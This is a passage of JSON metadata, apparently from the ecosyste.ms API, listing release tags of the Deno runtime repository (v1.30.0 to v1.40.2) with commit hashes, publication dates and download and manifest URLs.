2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/